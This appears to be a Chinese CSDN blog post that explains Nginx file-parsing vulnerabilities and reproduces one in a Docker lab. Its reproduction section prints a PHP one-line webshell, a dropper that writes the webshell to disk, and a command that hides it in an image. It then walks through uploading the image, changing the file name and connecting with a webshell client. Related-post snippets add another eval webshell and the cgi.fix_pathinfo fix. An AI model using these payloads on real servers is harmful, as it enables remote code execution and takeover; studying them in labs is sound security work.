Nginx文件解析漏洞的原理与复现

已于 2022-03-30 20:21:55 修改
阅读量7.4k 收藏 3
点赞数 3
分类专栏: 中间件漏洞 文章标签: web安全 nginx 安全
于 2022-03-30 01:04:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LJH1999ZN/article/details/123835818
版权

一、Nginx的简介

Nginx (engine x) 是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like 协议下发行。其特点是占有内存少,并发能力强,事实上nginx的并发能力在同类型的网页服务器中表现较好,中国大陆使用nginx网站用户有:百度、京东、新浪、网易、腾讯、淘宝等

二、Nginx漏洞的原理

1,Nginx越界读取缓存漏洞(CVE-2017-7529) 可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容。

2,Nginx 文件名逻辑漏洞(CVE-2013-4547) 主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。

3,Nginx解析漏洞复现 第3和第2都是文件解析漏洞,只是利用的方式不同,第2利用方式为:1.png.php。而第3利用方式为:1.png/.php。这样,1.png文件就会当成php文件进行解析。从而造成代码执行等。

三、Nginx漏洞的复现

11.php内容:   <?php eval(\$_POST['chopper']);?>

1.PHP内容: <?php fwrite(fopen("/var/www/html/uploadfiles/nginx1.php","w"),"<?php eval(\$_POST['chopper']);?>")?>

1.制作图片木马,使用命令: copy nginx.png/b+1.php nginx1.png     获得图片木马nginx2.png

进入docker容器,开启响应的进程,然后上传图片码

 进行抓包修改文件名

 然后进行访问http://192.168.44.145:8080/uploadfiles/nginx.png .php并且抓包,

 

然后使用菜刀连接:http://192.168.44.145:8080/uploadfiles/nginx1.php

一句话木马
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Nginx 解析漏洞及利用
Tauil的博客
07-20 7448
Nginx解析漏洞解析漏洞是PHPCGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认开启,当URL中有不存在的文件,PHP就会向前递归解析在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg解析为php文件。来上传我们的文件,很显然,不给上传,东西写进去文件被破坏了,被检验出不是正常的jpg不能上传了,可能有些朋友就成功了,因为第一次的时候我是可以的,在应该是写的内容太多了,出了问题。phpeval($_POST["cmd"]);...
Nginx解析漏洞测试
09-19
Nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作...默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析,这将导致严重的安全问题,使得恶意的攻击者可能攻陷支持php的nginx服务器。
使用iptabls策略来禁止主机被ping以及相关漏洞处理
weixin_44207346的博客
04-24 884
因为安装环境的时候没有安装iptables-service服务,因此只用在有的策略的基础上,添加。执行了以上命令,就是禁止其他主机来ping该主机。执行了以上命令是处理CVE-1999-0524。执行了以上命令是处理CVE-1999-0633。CVE-1999-0524漏洞处理。
Nginx漏洞解析
最新发布
A526847的博客
06-05 1889
开启这一选项有什么用呢?看名字就知道是对文件路径进行“修理”。举个例子,当php遇到 文件路径“/aaa.xxx/bbb.yyy/ccc.zzz”时,若“/aaa.xxx/bbb.yyy/ccc.zzz”不存在,则会去掉最后的 “/ccc.zzz”,然后判断“/aaa.xxx/bbb.yyy”是否存在,若存在,则把“/aaa.xxx/bbb.yyy”当做文件 “/aaa.xxx/bbb.yyy/ccc.zzz”,若“/aaa.xxx/bbb.yyy”仍不存在,则继续去掉“/bbb.yyy”,以此类推。
Nginx 解析漏洞
qq_46081990的博客
05-28 1118
这是由于 Nginx 把以 .php 结尾的文件交给 fastcgi 处理,但 fastcgi 处理的时候发并没有这个文件,于是 fastcgi 会继续向上查找,然后找到了上级文件 .jpg,于是就把 .jpg 当作 PHP 文件处理,导致漏洞产生。1、 将 php.ini 文件中的配置项 cgi.fix_pathinfo 的值设置为 0,这样 PHP 解析 webshell.jpg/1.php 这样的目录时,只要 1.php 不存在就会显示404页面。分析文件上传页面 index.php 源码。
nginx漏洞(包含nginx的介绍,配置,访问控制等内容),是较全的nginx学习!
m0_67284865的博客
08-16 6237
这篇文章包含nginx的介绍与配置,其中包含访问控制的安全,有漏洞案例:Nginx 文件名逻辑漏洞(CVE-2013-4547)Nginx越界读取缓存漏洞(CVE-2017-7529)Nginx 配置错误导致漏洞 Nginx 解析漏洞
Nginx目录遍历漏洞
huayimy的博客
12-30 2115
Nginx目录遍历漏洞,this statement may fail through,error: 'struct crypt_data' has no member named 'current_salt'
Nginx服务器配置文件完全解析
09-30
**Nginx服务器配置文件完全解析** Nginx是一款高性能的HTTP和反向代理服务器,以其高效的异步非阻塞I/O模型而闻名。本文将深入解析Nginx的配置文件,帮助读者理解和掌握如何优化Nginx服务器的性能。 首先,配置...
Nginx 配置文件上传与下载
01-09
最近在做项目中需要给前端提供文件下载链接,所以借着机会搭建了基于Nginx文件服务器,特此记录便于日后查阅。 1、配置文件 需要修改 nginx.conf 配置文件(内网地址:10.12.1.215、外网地址:113.98.58.42),...
centos8 nginx1.20.1 与nginx配置文件
05-03
在`nginx.service`文件中,添加如下内容,确保路径和指令正确: ```ini [Unit] Description=Nginx HTTP Server After=network.target [Service] User=nginx Group=nginx ExecStart=/usr/local/nginx/sbin/nginx ...
Xshell 连接 linux慢
YlanHds的博客
05-03 681
Connecting to 172.16.0.11:22... Connection established. To escape to local shell, press 'Ctrl+Alt+]'. Last login: Wed May 2 22:38:38 2018 from vrouter如上:解决办法vi /etc/ssh/sshd_config 将#UseDNS yes改为 Use...
常见的Nginx等保漏洞 及 处理方式
qq_70095877的博客
07-19 1981
【代码】常见的Nginx等保漏洞 及 处理方式。
Nginx解析漏洞
热门推荐
钟言的博客
01-28 1万+
本篇为Nginx解析漏洞,详细内容包含了搭建环境 过程 漏洞原理及防范同时包含了配置过程中出的问题以及解决方案等等。
基于Nginx关于OpenSSL漏洞的修过程再说说编译过程
kitgenius的博客
02-08 549
OpenSSL这个库应用非常广泛,实际业务环境中使用广泛的Nginx、SSH都有用到,一旦使用了漏洞版本则可能产生安全问题。之前在公众号发布过《一个关于OpenSSL和Nginx漏洞过程》和《Nginx编译并动态链接OpenSSL库》,上述两文中编译安装了Nginx。本文对动态编译Nginx程序时链接不同版本的OpenSSL库进行对比说明,并深入一点说说实验中的编译过程。
Apache、Nginx、IIS文件解析漏洞
qq_68163788的博客
05-29 1051
文件解析漏洞是指在Web服务器(如Apache、Nginx、IIS)中存在的一种安全漏洞,攻击者可以利用该漏洞来执行恶意代码或获取敏感信息。这种漏洞通常涉及服务器错误地解释用户输入的文件或数据,导致攻击者能够访问服务器上的文件系统、执行任意代码或进行其他未经授权的操作。攻击者通常会尝试通过构造特定的恶意请求来利用文件解析漏洞,从而绕过服务器的安全控制机制。
vulhub漏洞44_Nginx
weixin_44193247的博客
02-10 1432
vulhub漏洞练习篇
nginx文件解析漏洞
weixin_50985113的博客
10-10 1296
当我们访问 http://IP地址/a.jpg/.php时,该URL是可以匹配上面的正则表达式 .php$,但是在php-cgi解析时会提取真正的文件名http://IP地址/a.jpg,并对其解析。这样就成功的执行了jpg文件中的php代码。中的cgi.fix_pathinfo=1改为0(在不影响业务的情况下)找个图片,写个phpinfo()到里面。正常的配置是把这一段注释掉的。修意见就是把这一段注释掉。或者将# php.ini。nginx的配置文件
nginx中间件解析漏洞的影响
06-10
Nginx 中间件解析漏洞是指攻击者利用 Nginx 中间件解析漏洞,通过构造恶意请求,从而绕过服务器的安全措施并执行任意代码。这种漏洞可以允许攻击者在服务器上执行任意的系统命令、读取、修改或删除服务器上的敏感文件,或者通过服务器作为跳板攻击其他系统。 这种漏洞的影响范围非常广泛,可能会影响到运行 Nginx 服务器的任何组织。攻击者可以利用这种漏洞来窃取敏感数据、破坏系统或进行其他恶意活动,这可能会导致严重的安全问题和数据泄露。 因此,及时修补 Nginx 中间件解析漏洞至关重要。同时,建议您采取其他安全措施,例如启用防火墙、使用安全认证机制、限制对服务器的访问等,以最大程度地减少遭受攻击的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一句话木马

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值